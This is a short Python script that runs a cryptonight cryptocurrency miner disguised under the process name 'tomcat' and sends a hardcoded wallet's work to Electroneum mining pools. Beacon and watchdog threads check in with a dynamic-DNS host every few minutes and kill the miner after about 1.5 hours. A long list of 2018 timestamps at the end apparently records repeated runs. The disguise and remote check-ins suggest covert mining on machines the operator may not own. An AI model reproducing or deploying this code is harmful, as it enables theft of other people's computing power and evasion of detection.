import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:38:06.239447
#2018-02-17 17:26:02.145125
#2018-02-17 19:14:06.013976
#2018-02-17 21:04:01.755527
#2018-02-17 22:48:06.052078
#2018-02-18 00:33:05.756403
#2018-02-18 02:23:05.017589
#2018-02-18 04:10:03.894000
#2018-02-18 06:01:05.575017
#2018-02-18 07:51:07.479680
#2018-02-18 09:39:05.952202
#2018-02-18 11:24:06.800988
#2018-02-18 13:10:08.677611
#2018-02-18 14:58:06.458370
#2018-02-18 16:47:02.043251
#2018-02-18 18:35:05.382839
#2018-02-18 20:22:06.498895
#2018-02-18 22:08:01.973904
#2018-02-18 23:56:02.187483
#2018-02-19 01:42:05.535730
#2018-02-19 03:30:03.128209
#2018-02-19 05:14:05.983330
#2018-02-19 07:01:07.591819
#2018-02-19 08:49:03.906822
#2018-02-19 10:39:05.941155
#2018-02-19 12:27:01.751991
#2018-02-19 14:16:01.295937
#2018-02-19 16:05:09.782396
#2018-02-19 17:52:07.601197
#2018-02-19 19:38:05.867252
#2018-02-19 21:27:04.418490
#2018-02-19 23:12:05.481218
#2018-02-20 00:58:03.450423
#2018-02-20 02:47:07.347011
#2018-02-20 04:36:01.618615
#2018-02-20 06:20:06.956498
#2018-02-20 08:05:08.501580
#2018-02-20 09:51:06.729441
#2018-02-20 11:35:04.355876
#2018-02-20 13:23:06.295636
#2018-02-20 15:08:06.924495
#2018-02-20 16:52:09.375101
#2018-02-20 18:41:09.107068
#2018-02-20 20:33:01.264535
#2018-02-20 22:17:05.632545
#2018-02-20 23:59:05.869530
#2018-02-21 01:45:07.440503
#2018-02-21 03:35:06.053839
#2018-02-21 05:24:06.112938
#2018-02-21 07:12:06.831756
#2018-02-21 08:58:06.565262
#2018-02-21 10:48:01.754889
#2018-02-21 12:34:02.006529
#2018-02-21 14:20:11.347979
#2018-02-21 16:08:01.384283
#2018-02-21 17:58:08.544220
#2018-02-21 19:46:07.779922
#2018-02-21 21:34:08.283979
#2018-02-21 23:21:01.437072
#2018-02-22 01:10:07.707265
#2018-02-22 02:56:07.772645
#2018-02-22 04:42:07.230993
#2018-02-22 06:27:01.357141
#2018-02-22 08:14:06.099799
#2018-02-22 10:03:05.495517
#2018-02-22 11:49:06.826446
#2018-02-22 13:35:09.653141
#2018-02-22 15:23:09.065360
#2018-02-22 17:07:08.685644
#2018-02-22 18:53:08.829518
#2018-02-22 20:45:10.008625
#2018-02-22 22:32:06.047666
#2018-02-23 00:18:04.989743
#2018-02-23 02:07:06.588551
#2018-02-23 03:56:06.770346
#2018-02-23 05:44:01.732360
#2018-02-23 07:34:05.419262
#2018-02-23 09:37:05.740612
#2018-02-23 11:43:01.302259
#2018-02-23 13:32:09.604621
#2018-02-23 15:21:01.576037
#2018-02-23 17:09:07.797254
#2018-02-23 18:55:04.078801
#2018-02-23 20:41:06.669006
#2018-02-23 22:27:08.643464
#2018-02-24 00:12:04.770521
#2018-02-24 02:04:06.338249
#2018-02-24 03:55:03.235116
#2018-02-24 05:40:06.158991
#2018-02-24 07:28:04.144673
#2018-02-24 09:15:08.508447
#2018-02-24 11:08:04.205157
#2018-02-24 12:56:06.450899
#2018-02-24 14:43:02.223612
#2018-02-24 16:34:04.287670
#2018-02-24 18:24:02.053831
#2018-02-24 20:10:03.745381
#2018-02-24 21:54:06.383990
#2018-02-25 01:50:03.986789
#2018-02-25 04:50:08.230955
#2018-02-25 08:12:05.101089